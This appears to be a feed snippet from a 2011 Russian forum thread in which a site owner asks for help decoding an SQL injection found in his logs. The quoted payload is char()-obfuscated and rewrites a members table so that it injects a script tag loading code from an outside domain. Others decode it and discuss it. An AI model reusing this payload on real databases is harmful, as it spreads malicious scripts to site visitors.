http://softtime.ru/forumhttp://softtime.ru/forum/read.php?id_forum=3&id_theme=80170#post477743Маловероятно, что это рабочая SQL-инъекция... даже если использовать расширение php_mysqli вместо php_mysql, что теоретически позволяет выполнять сразу несколько запросов, синтаксис...Помогите расшифровать sql-инъекциюSat, 16 Apr 2011 16:08:35 +0300cheopshttp://softtime.ru/forum/read.php?id_forum=3&id_theme=80170#post477742а сама sql-инъекция реально рабочая? каким образом вы расшифровали код? и еще вопрос внутри replace можно использовать функцию cast?Помогите расшифровать sql-инъекциюSat, 16 Apr 2011 16:02:16 +0300admiralhttp://softtime.ru/forum/read.php?id_forum=3&id_theme=80170#post477713Вот эту строку (за минусом пробелов) пытались вставить в Forename "/ti tle" "scr ipt src= http ://l izam oon. com/...Помогите расшифровать sql-инъекциюSat, 16 Apr 2011 08:58:39 +0300cheopshttp://softtime.ru/forum/read.php?id_forum=3&id_theme=80170#post477702prodig=12'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)) ,cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2B char(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(11 6)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bch ar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122) %2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar (111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)% 2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(1 05)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- нашел в логах такой код? что он мог бы значит. Могли...Помогите расшифровать sql-инъекциюSat, 16 Apr 2011 01:31:09 +0300admiral